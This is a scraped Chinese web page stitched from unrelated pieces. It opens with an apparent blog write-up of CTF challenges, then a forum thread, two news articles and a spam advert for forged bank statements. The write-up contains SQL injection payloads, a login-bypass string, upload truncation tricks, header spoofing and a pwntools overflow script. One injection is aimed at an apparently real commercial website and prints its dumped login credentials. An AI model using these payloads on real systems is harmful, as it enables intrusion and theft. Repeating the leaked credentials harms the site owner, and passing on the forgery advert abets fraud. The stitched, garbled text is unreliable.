iOS在绝地求生创建房间要求类有没有什么要求,一个应用那么多

7840人阅读
骚年来一发吗
根据加密的函数,写个解密的函数就可以了
function encode($str){
$_o=strrev($str);
for($_0=0;$_0&strlen($_o);$_0++){
$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;
return str_rot13(strrev(base64_encode($_)));
function decode($string){
$string=base64_decode(strrev(str_rot13($string)));
for($_0=0;$_0&strlen($string);$_0++){
$_c=substr($string,$_0,1);
$__=ord($_c)-1;
$_c=chr($__);
$_=$_.$_c;
$string=strrev($_);
$string='iEJqak3pjIaZ0NzLiITLwWTqzqGAtW2oyOTq1A3pzqas';
echo decode($string);
wireshark&2
拿到这题,用wireshark打开之后,右键追踪了一下第一个包的tcp流,鼠标拖到最下面,居然有收获
赶紧就把它提取出来
(关于提取方法,最好是先把以原始数据文件形式保存,然后用十六进制编辑器来提取,也有一个偷懒的办法,就是用foremost直接提取,不过有些时候提取没有手工效果好,这里还因为它提取出来的压缩包里额外多了一个文件,所以是不可以的)
提出来之后,稍微修复一下,提示文件格式损坏,我就没办法了,后来龙神说用zip修复工具,就下了一个(可以直接百度搜到),工具处理之后就好多了
继续解压之路吧,没想到有密码,试了一下伪加密也不行,这里有坑,如果输任意字母的话,不会提示密码错误,但是flag.Txt&内容就是乱码,像这样
原因我也不知道
之后就是找密码的过程了,一开始以为是爆破,于是爆破6位数字,但没结果
实在没办法了,还在kali里面用查字符串工具在原文件里查字符串,想要找密码也是够了,后来发现
然后龙神想到可以在源文件里过滤一下这种http的包,结果是很讽刺的
我们走了多少弯路。。
追踪了下secret的tcp流,得到
卒……………….
最后再说一下感受,好的工具真重要
又重新按照之前的过程做了一遍这题,但是,做不出来了,修复压缩包的时候总是修复不好,没办法,求助,明神说中间有两行&PK,删掉下面那行就好了,神奇的思路,我也不知道为什么
只有三个位置有缺失,写一下,很快就出来了
#!/usr/bin/python
# -*- coding:utf-8 -*-
# 有一点没考虑,就是明文数字的存在,但是答案出来了,就这样吧
import md5
import string
for i in string.uppercase:
for j in string.uppercase:
for k in string.uppercase:
a='TASC'+i+'O3RJMV'+j+'WDJKX'+k+'ZM'
c=md5.md5(a).hexdigest()
if(c[0:5]=='e9032'):
就是简单的一个异或.......
#!usr/bin/python
#-*- coding:utf-8 -*-
file_a=open('mi.txt','rb')
file_b=open('mingwen.txt','rb')
a=file_a.read()
b=file_b.read()
for i,j in zip(a,b):
s+=chr(ord(i)^ord(j))
丘比龙DE女神
乍一看这题目,感觉有点熟悉,以前好像看过这样题目的wp,于是搜了一下
思路有点不一样
用winhex查看一下图片,发现最后有&&PK&&还有一张图片的名字&&nvshen.jpg
于是拿foremost去自动提取,然而居然没结果,怎么会没结果呢,一定是有一个压缩包啊,没办法只好手工提取,winhex查找16进制:504B0304&(zip文件头是504B0304,可以临时找两个zip文件看,不用记)结果,没找到。。。。。。。。。
那就换个思路,找图片的结束部分,下几张gif图片比对一下,搜了下&003B,
应该就是这里了,但是文件头不是PK,先弄下来再说
之后找了几个zip文件对比着把弄下来的文件修复了头部,然后解压
提示有密码,那就把刚刚看到的那个&&love&&输进去试试,然后,图片就出来了,之后就没什么了
这题的提示很多,再根据密码重置1&&,还是比较好做的
第一个提示说管理员邮箱很容易找到,在源代码里就找到了管理员邮箱
之后说linux&&&&vi编辑器,异常退出之后会留下备份文件,查了一下应该是原来的文件名后面加上&.swp&&
然后根据密码重置1&的思路,把路径改为
即可得到内容,这里看因为编码问题是乱码,那就抓个包,在抓包工具里看
对邮箱的限制
对密码的要求,等于0而且长度为10
写了十个0,顺利拿到flag
flag:nctf{thanks_to_cumt_bxs}
这题想复杂了,直接盲注就好了
http://www.backstagecommerce.ca/services.php
?id=4 and 1=2 UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users -- -
注出来是这个,把密码MD5就可以了
marketing:BSCmarketing24
这题给我的启示就是先盲注,不行的话再按库,表,列来
常见表:admin&&user&&users
常见字段:&user&&username&&pass&password
flag:nctf{f3d6cc916dbc92911dddb}
Key: ntcf{union_select_is_wtf}
打开之后,有一大串符号,应该知道是jsfuck了,可以直接在控制台下运行,
得到这个就可以访问了
那就应该是在请求的头部有信息
在这儿就不会了
后来经过龙神指点,又百度了下&&&&bash&查看历史
于是把路径改成
然后再改下路径
下载之后解压就完了,没有什么难点
flag :nctf{bash_history_means_what}
sql&injection&4
flag:nctf{sql_injection_is_interesting}
php反序列化
并不知道怎么做
一开始找到了php的反序列化函数说明,还准备自己手动来一下,不过应该一开始思路就错了
搜了一下,居然发现了原题,
根据这个方法,我去做了下,而且是无脑的把一串问号换成了&*&&,生成反序列化的串之后怎么也不对
明神说肯定不对啊,他那写的是&****&&,但其实不是啊,那个只是不让你看见而已。。
顿时觉得自己傻帽了,但是又不知道怎么能够知道secret的值,要是知道不就做出来了吗
明神说应该是&php的引用,也就是应该写成这样:
$a-&enter=&$a-&
PHP&的引用允许你用两个变量来指向同一个内容,这样就好办多了
(对了,不用进行url编码)
Flag&:nctf{serialize_and_unserialize}
之前一直放着,不懂怎么做
今天又过了一遍,就出来了
首先按默认账号&ctfuser&&密码&ctfuser&提交一下
注意到有一个参数,urldecode之后再base64decode,发现是ctfuser
试了一下直接把参数改成&admin base64之后再urlencode,把账号改成admin
但是发现账号栏是只读的
那只有抓包来改改试试了
需要修改的地方如下
然后发送就得到了flag
Flag :nctf{reset_password_often_have_vuln}&&&&&&&&&&&&&&&&&&&&&&&&
继续龙神的指导
注入,还给了源码,那就分析吧
只是把输入的参数直接拿过去,进行sql语句查询,没有对输入的参数进行过滤
因为密码不知道,所以就要想办法使其忽略密码,就是把密码那儿给绕过,通过观察可以知道,可以让其只判断user是否为admin,后面的给注释掉,也就是给username那框赋值为:
admin') -- -&&&&&&&&&&&&&&&&&&--是注释,为什么这么写,是因为这是sql风格的注释
flag:nctf{ni_ye_hui_sql?}
没什么思路,在fiddler里把filename改成各种名字
我提交a.jpg
提交&a.php
龙神说截断,我就试了
&&&&&&&&&&a.jpg&&php
&&&&&&&&&&a.php.jpg
&&&&&&&&&&a.jpg.php
再之后龙神说改16进制,空格改成&00,这样可以截断,
到最后,我才知道自己改错了地方,不是filename,而是改filepath下面的那行,具体原理我也不知道,这里有介绍过程:
然后改的成果是这样的
flag:nctf{welcome_to_hacks_world}
(这题好像不能这么做了,出不来flag,就看看思路吧)
经过前面的&&&你从哪里来的指点,想到了应该改一下referer,
这个东西是只有直接点击那个链接才会出现的,如果没有的话,自己再加一个
之后还是不行,当然不行,不能两道题都出一样吧,后来龙神说X-forwarded-for
然后就去查了一下,发现了可以进行ip伪造
原链接讲的是用插件来伪造的,其实只要加一句话就够了,这里我们要根据题目伪造本地登录,那就还是127.0.0.1
于是最后应该把请求改成这样
提交也就拿到了flag
Flag:nctf{happy_http_headers}
PHP是世界上最好的语言
坑,坑,坑
题目看着很简单,不让等于这个,又让等于这个。。尴尬症都犯了
明神说url编码,传输过去默认会解码一次,也就是说你需要把要传的值url编码两次
你要传的值是&hackerDJ,感觉这里又是一个坑,因为url编码一般是不会对字母转换的,这里就要手工来了……….
类似于这样的东西,手工之后是这样的:
%68%61%63%6b%65%72%44%4a
这样之后再拿工具来urlencode一次:
%63%256b%44%254a
把这个传过去就OK了
做这个做的郁闷……………之后又听说只对一个字母做变换就好了…
这道题主要是截断,截断可以用&%00&&.&&./&&&&/.&&空格什么的
然后传的变量还必须是数组类型的,因为如果截断的话,你要传的值就不是一个了,变成了两个,如果不是数组形式的话,只能把前面的传过去,后面的根本没过去
比如一种形式:nctf[]=1.#biubiubiu
flag:nctf{use_00_to_jieduan}
sql&injection&3
这题我完全不会,之后看了龙神的wp,我就大概写一下过程
这是原页面,既然有id=1,那就试试&0
发现2有些古怪
然后就是套路了
?id=1%df%27&and&1=2&union&select&1,2&--+- & & &加&and
1=2&据说是为了让只执行后面的
只有1,2是回显的
?id=1%df%27&and&1=2&union&select&1,database()&--+- &&确定数据库&&&&database()&是一个函数
?id=1%df%27&and&1=2&union&select&1,table_name&from&information_schema.tables&where&table_schema=0x&--+-
根据数据库把表注出来&0x是数据库名的16进制(不知道为什么)
Information_Schema.Tables&&这里存放的是数据库的所有表的元数据信息
?id=1%df%27&and&1=2&union&select&1,column_name&from&information_schema.columns&where&table_schema=0x&--+-
根据数据库再把列注出来
Information_Schema.Columns &这个是存放管理列的信息了
?id=1%df%27&and&1=2&union&select&1,fl4g&from&flag&&--+-
然后就可以注出flag(现实中应该是用户名,密码)
Flag: nctf{gbk_3sqli}
我一开始的思路是这样的
然后试了一下,最多只有这几个有内容
再之后就没思路了,
龙神告诉我是php msql&精度问题
于是试了试把1024&改成&00
不行就在后面又加了一个1,结果
很好很好,后来试了&1024.1也可以
Flag:nctf{query_in_mysql}
Download~!
虽然提示不让下音乐,但我还是下载了音乐,并且还听了好几遍………..
龙神说看源码的下载链接是base64,然后解出来就是那两个歌的名字
到这里我居然还没思路………龙神无奈的说换成download.php试一下
于是………..就下到了这个
再换成hereiskey.php,答案就出来了
这思路,真厉害
Flag:nctf{download_any_file_666}
单身一百年也没用
把过多的关注点放在了源码上,而没有去注意网络,其实你看到网址变了,web9都变成web8了,那很容易就会想到把firebug打开看一下发生了什么
所以当没思路时,关注点要放宽一点
当你看到flag时,如果不着急,也可以看看为什么会这样,302的重定向问题,涉及到了网络劫持,可以看一下百度百科
nctf{this_is_302_redirect}
我以为我都试过了,但其实没有…….
可能是试了几次然后就放弃了,不知道
文件包含总结网址
然后得到一段base64,解密之后是判断的源码
可以看到过滤了&../&&&tp&&&&input&&&data
Filter没有过滤,那么就得到flag
flag:nctf{edulcni_elif_lacol_si_siht}
你从哪里来
这题跟我的习惯有点关系吧,我一般直接把网址拖过去,火狐就直接打开了,但是如果这样,
把fiddler打开,设置成请求前拦截
可以对比一下差别:
这个就让我把referer给忽略掉了,之后又是一顿查怎么伪造身份,方向就跑偏了
习惯在这儿害死人啊,不过说到底还是基础不扎实……….
&改成这样就好了
以后还是把flag附在最后吧,以防以后有用……
flag:nctf{http_referer}
md5&collision&
我没思路,队友说&QNKCDZO&的MD5值是0E&开头的,于是秒懂,因为比较的是两个串
但是可以解析成数字,也就是说,结果都是0.。。
于是去找md5值前两位是0E&的字符串,一开始找到这个:
但放上去居然不对,提示我false,我就不理解了
之后又把&QNKCDZO&的MD5值搜了一下,然后就找到了
没思路,小伙伴今天告诉我了
看源代码之后,iframe奇怪!
那些属性都是0,于是当然要点链接进去看看了,每次都点第一个iframe里的链接
----------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
就到了这里,完全被这个故事吸引了,而key还是没找到。。
不得不说眼瞎了,小伙伴又告诉了我
这堆我看起来没用的js。。
我已经不想说话了
貌似最后连菜刀有点错误,我测试不行,换了一下
网址应该是?
密码是 wtf
汇编代码慢慢去看,理清思路,还是可以理解的
函数的输入有两个参数,一个数组,一个数字:28,数组的长度是29,第一个是0,最后一个0x1c,是28
看完输入就具体看看汇编代码吧
做了一些处理之后,跳转,比较之后再跳回上面,这样的结构很容易想到while循环,那一定是有一个循环变量和一个出口的,
大概看一下,发现循环变量就放在 [rbp-0x4] ,它每一次的值都会被加1,出口呢,就是比较的时候另外一个&[rbp-0x1c] 了
我们也应该知道那个数组被放在哪里了,就在 &[rbp-0]~[rbp-0x1c] 这个范围里,[rbp-0x1c] 这个地方存的是0x1c,就是28
然后看看循环里面干了什么事情,
前面就是取循环变量和数组中的值,
xor & &edx,ecx & 这句是关键,异或之后放到edx中
再之后会把异或之后的结果存在原来的数组里
最后会输出处理之后的数组
理清思路,其实很简单,就是把数组跟循环变量异或之后输出就可以了,下面上脚本
# !python3
# coding:utf8
aa = [0x67,0x6e,0x62,0x63,0x7e,0x74,0x62,0x69,0x6d,0x55,0x6a,0x7f,0x60,0x51,0x66,0x63,0x4e,0x66,0x7b,0x71,0x4a,0x74,0x76,0x6b,0x70,0x79,0x66]
for i in range(len(aa)):
str1 += chr((i+1)^aa[i])
print(str1)flag:flag{read_asm_is_the_basic}
找一个在线pyc反编译网站:https://tool.lu/pyc/
反编译出来写一个解密函数
def de(message):
message = message.decode(&base64&)
for i in message:
x = (ord(i)-32) ^ 32
print(chr(x))
return s但是这样出来结果不对:nctf{d3c0mpil1n9y}
有三个不可见字符,考虑一下爆破
import string
dic = string.printable[:-6]
for i1 in dic:
for i2 in dic:
for i3 in dic:
str1 = &nctf{d3c0mpil1n9& + i1 + i2 + &y& + i3 + &}&
if encode(str1) == correct:
print(str1)得到结果
flag:nctf{d3c0mpil1n9_PyC}
When Did You Born
思路就是利用gets函数覆盖生日值,方法下载脚本里了,需要用到pwntools
# !python3
# coding:utf8
# 用IDA得到两个变量的偏移,差值就是要填充的长度
输入的名字
from pwn import
#conn = remote(&115.28.79.166&,5555)
conn = process(&./test&)
payload = 'a'*8 + p32(1926)
conn.recvuntil(&What\'s Your Birth?\n&)
conn.sendline(&11&)
conn.recvuntil(&What\'s Your Name?\n&)
conn.sendline(payload)
conn.interactive()应该是这样的,环境挂了,改天看看flag是什么
最后的话。。
往上面传图片是个累活。。
然后还剩:Vigenere
希望大神可以帮忙看看,给点思路。。
感谢小伙伴
&&相关文章推荐
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:39363次
积分:1367
积分:1367
排名:千里之外
原创:93篇
转载:25篇
(10)(29)(15)(4)(1)(1)(2)(2)(8)(2)(2)(9)(5)(4)(2)(6)(13)(7)有人知道学校的邮箱如果多次输入密码错误被锁了怎么办么?【南京邮电大学吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:226,600贴子:
有人知道学校的邮箱如果多次输入密码错误被锁了怎么办么?收藏
找到之前的密码了但是还是提示这个,感觉可能被锁住了,有什么办法可以解决么?还是说第二天就会恢复正常?有遇到这个问题的小伙伴么?
AutoTDS-V1型全自动热解吸仪是一款20位常温二次全自动热解吸仪,气路采....
直接去信息管理办公室吧
登录百度帐号推荐应用已收藏本页面
破1就靠它了~
难道露珠不是房山的咩
我是LZ,这不是P的~应该也不是坟吧~至少我好像没见过谁发过~~
楼上全被芙蓉亲过
你妹的,那是烧鸡公好么!
我是来看骂楼主的。。。这是坟没人看的出来吗?
楼上的,p你妹啊,别什么图都説p过。人家只是公壞了
云县后山灯光球场下
好吃不?。。
烧鸡八,还滋阴呀!
3楼射38楼一脸
武宁的糗友?
这是烧鸡还是鸡八
烤烤更好橹
烧鸡公!我记得旁边还有个温歌华!我南宁的
有点意思,老是让我在多点内容,男人门都一起进去烧烧呗
貌似鸡没JJ,哈哈
毫无PS痕迹
鸡的jj我都看不到
38楼的我要尿尿了
这玩意大补么?
是南坝吗!
哈哈哈,刘明
南邮附近?
真为18楼智商捉急
烧鸡公。。。。
里面的东西吃了会脖起
留名,会火
前5楼都是人才
妈的我们这也有
我也看到了 一個城市的麼?
生活乐趣多。
PS痕迹太明显了
4楼网速是有多慢
何必狗咬狗。。
嘉定?!我也见过
溧阳?!貌似。
银川的么??
感觉好像华士的自由街
楼上的,全部拉进去,
一楼?笑摸二楼狗头
2l是李老幺
后才能发表评论
你可能喜欢的图片笑话
最受欢迎的爆笑笑话当前位置:
南邮三学生办快递代收 一个多月赚近2000元
冯勃对照手上的名单,帮同学取快递 李雨泽 摄  
“喂,同学您好!请问是需要我们帮忙取快递吗?请问您的包裹是哪家快递公司送的?您最好把快递员发给您的短信转给我,加上您的姓名和宿舍号,方便我帮你去提,然后送给你。”昨天中午12点多,南京邮电大学信息工程专业的大二学生冯勃,接到了当天的第一笔生意。  
在南京大多数高校,快递员不能进校园,学生只能到校门口取快件,如果当时本人不在学校,或者正在上课,只能再约时间,很不方便。冯勃从中看到了商机,上个月,他和同班同学小周、小李创办了“豪神”快递代理,目前盈利近2000元。  
代收快递,每件两元  
昨天中午1点左右,在南邮仙林校区南大门外,冯勃和他的同学小周,站在一辆圆通快递的面包车前,低头撕下代同学们签收后的快件存根,交给快递员。这个活琐碎又不能有半点马虎,“就为了让快递员能分给我们一些快递代理业务。”  
昨天,圆通快递一共有1000多件快件,要派送给南邮学生。其中有近百件因主人有事外出,或上课不便取等原因,无人认领。这些快件,就是小冯和他的伙伴们要等的“业务”。  
10月8日,冯勃和两位同班同学创办了“豪神”快递代理。“在我们学校,很多快递公司是不给进校门的,这样同学就要到校门口取件。因为学生公寓离校门口远,有的同学懒得取或者因为那个时间段不方便去取,我们就可以为他们代取,再送到他们手中。每件收费两元,特别重特别远的收3块到5块钱。”  
送货送到晚上10点多  
除了从快递公司手中揽到一点业务外,还有很大一部分同学主动跟小冯联系。“我们在学校的人人网上发布了快递代理信息,还做了横幅和宣传页到各个学生公寓去‘扫楼’,效果很好,每天都能接到一些电话。”  
小冯笑着告诉记者,他们的装备简称“一二三”:一辆自行车、两个购物篮,还有三个人。“学校有8个学生公寓,我们3个人,男生跑男公寓,女生跑女公寓。一晚上下来,有的公寓每个楼层都走遍了。”  
小冯说,最近正好遇上双十一,他们代理的快件每天有五十多件,要忙到晚上10点多,“一直跑到两腿发软,才回到宿舍。”  
昨天,现代快报记者见到冯勃时,他已经将送货装备自行车换成了电动三轮车。“没办法,现在业务量太大了,骑自行车已经送不过来了。”从10月8日开张至今,他们已经盈利近2000元。  
其实,冯勃接触快递这一行,并非偶然,他的爸爸就是快递员。虽说家里供他生活费没问题,但小伙子还是想自力更生。如今,很多同班同学都发展成为他的客户。(俞月花 金凤)
新华社—现代快报
编辑:陈霞&管小峰
人参加互动
网友评论仅代表个人看法,并不代表本网观点和立场。您留言时请遵守。
京ICP证000006号 |
网上传播视听节目许可证(0104065)|
地址:南京市玄武大道699-19号(徐庄软件园)1栋 |
电话:025—582899 |
投稿信箱:
未 经 书 面 授 权 禁 止 使 用佛山办银行流水_佛山办银行流水_ 百度 _ 知道
>>>>新闻报道
佛山办银行流水
佛山办银行流水【电.话:151.】【微.信:A】【σσ:】,【货.到.付.款】【行.业.顶.尖.品.质】【顺.丰.快.递】【诚.信.第.一】urogjedjwks ................../
  楚天都市报讯 图为:武汉纺大环境工程学院生物专业的男生为女生送上了自酿的红酒  楚天都市报记者周治涛 罗欣 实习生陈曦紫 通讯员侯庆 赵合珍 刘焕琼  昨日是&3&7女生节&,武汉不少高校的男生们纷纷变着法子讨班上女生们的欢心:送自酿的红酒,赠英文信,发放&任性券&&&收到礼物的女生们在朋友圈晒图,直呼幸福满满。  男生写34封英文信谢女生  &Thanking the advantage of young&&&昨日,武汉华夏理工学院外国语学院1168班的34名女生,都收到了一份特别的礼物&&来自该班男生周鹤龄的英文信件。  据了解,1168班共35人,周鹤龄是全班唯一的男生。为写好这34份英文信,周鹤龄查找翻阅了大量书籍和资料,花了3天时间才完成,每封信的写作方式都不一样。周鹤龄说自己性格比较内向,平时也不怎么爱说话,但是班上女生一直都很照顾他,比如上课的时候帮他留位置等。希望借此次女生节,向她们表达谢意。  昨天,收到信的女生都在朋友圈晒图,引起其他班女生羡慕:&这样的男同学,给我来一打&。  18名男生送50瓶自酿红酒  &女生节&前夕,武汉纺织大学环境工程学院生物专业的男生们,给班上的女同学和学院女老师们送上了一份特别的惊喜:每人一瓶他们亲手酿制的红酒。  该校生物专业11501班班长方刚介绍,全班共18个男生,10个女生,&去年12月初,我们到批发市场买回100箱葡萄,运货、卸货、灌装&&至今快5个月了,才酿制出了这50瓶红酒。&  前日中午,方刚将全班同学召集到实验室,男生们齐刷刷拿出红酒和祝福卡片。女生们惊喜不已:&很感动。虽然我们都学过酿酒,但真正清洗、发酵再到成品包装,耗时费力,男生们费了很大心思的。&  女生节可任性用&任性券&  &请你帮我带一份饭,好吗?&昨日,湖北大学通识教育学院新闻传播专业的学生徐婕妤拿着她的&任性券&,委托本班一名男生帮她带了饭。和她一样,有不少女生拿着&任性券&,让男生帮助做了一些力所能及的小事。&任性券&是湖北大学通识教育学院学生会为庆祝女生节准备的。这些券3月6日发给全体女生,3月7日女生可出示&任性券&向男生请求帮助。在双方都自愿的条件下,男生帮助女生后便可获得一张&任性券&,收集一定数量的&任性券&,当天就能兑换一些小礼物。&任性券&的点子,是该学院学生会主席张佳琪想出来的。她说:&女生拿&任性券&能享受一次&任性&,男生也能得到一些奖励,奖品则是征求男生们意见定下来的。&
(来源:楚天都市报 )
xzvdsmfepwq水果姐首向霉霉求和:对过去所做的一切感到抱歉租户的美好时代要来了?2015年赴日留学外籍高中生人数创新高 中国最多 世界首例再生骨修复大段骨缺损手术获成功特朗普狂砍万亿社保预算 穷人日子不好过王:柯洁中盘发挥非常完美 本有优势出现败招广元铊污染事故续:陕西宁强常务副县长等7人被停职 《来吧冠军2》赵帅郑姝音展示跆拳道魅力【FICC工作笔记】日 星期三象棋对局中的战术技巧古丝路始发港广西合浦打造特色旅游品牌 曝C罗要求皇马为自己加薪 索3000万欧看齐梅西
相关报道:
相关报道:
相关报道:
相关报道:
相关报道:
相关报道:
相关报道:
请选择频道
2008大畅想
本网站所刊载信息,不代表中新社观点。 刊用本网站稿件,务经书面授权。

我要回帖

更多关于 创建全国文明城市要求 的文章

 

随机推荐